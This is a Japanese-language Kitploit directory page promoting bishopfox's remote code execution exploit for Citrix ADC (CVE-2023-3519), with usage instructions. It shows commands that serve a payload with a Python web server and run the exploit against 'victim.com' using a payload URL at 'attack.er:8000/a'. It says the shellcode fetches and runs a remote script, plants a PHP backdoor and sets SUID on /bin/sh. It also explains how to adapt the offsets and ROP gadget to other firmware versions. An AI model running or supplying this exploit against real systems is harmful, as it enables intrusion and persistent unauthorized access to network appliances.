Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-3519 — CVE-2023-3519 の RCE エクスプロイト | Kitploit
ツール/GitHubGitHub/bishopfox/cve-2023-3519
脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用リモートアクセスツールペイロード開発
GitHubbishopfox/cve-2023-3519

CVE-2023-3519

CVE-2023-3519 の RCE エクスプロイト

リポジトリを見る
2284353年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Citrix ADC RCE CVE-2023-3519

このエクスプロイトは、Citrix VPX 13.1-48.47 向けのアドレスとシェルコードを使用しています。詳細な解説はこちらをクリックしてください。

使用方法

シェルコードをビルドするには NASM が必要です。

root@kitploit:~
$ sudo apt install nasm

含まれているシェルコードは、リモートの http(s) サーバーからシェルスクリプトをダウンロードして実行します。このスクリプトは3つの引数を取ります: ターゲットホスト、ターゲットポート、およびシェルスクリプトペイロードの URL です。自身をクリーンアップする前に id と uname -a を実行するペイロードの例が、このリポジトリに含まれています。

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

URL はシェルコードバッファに収まるほど短くなければならず、長すぎると警告が表示されます。

シェルコードの痕跡

シェルコードは /var/netscaler/logon/a.php に PHP バックドアを作成し、/bin/sh に SUID ビットを設定します。含まれている sh ペイロードは、これらの痕跡を自動的にクリーンアップする例を示しています。また、シェルコードはファイルディスクリプタを閉じないため、過剰に繰り返しエクスプロイトを行うとリソースが枯渇する可能性があることに注意してください。

他のバージョンへの適応

FreeBSD ベースの Citrix ターゲットの場合、次の3つの値を見つける必要があります: 保存されたリターンポインタのオフセット、jmp rsp ROP ガジェット(または同等のもの、例えば push rsp; ret;)、そしてクラッシュを回避するためにジャンプするアドレスです。これらのパラメータはすべて cve-2023-3519.py の上部付近にハードコードされています。特定のバージョンでは、RBP 値を修正するために4つ目の値を見つける必要がある場合もあります。なぜなら、コンパイラは POP 命令を使用して保存されたレジスタを復元する代わりに、RBP 相対ロードを生成するからです。

ツールをダウンロード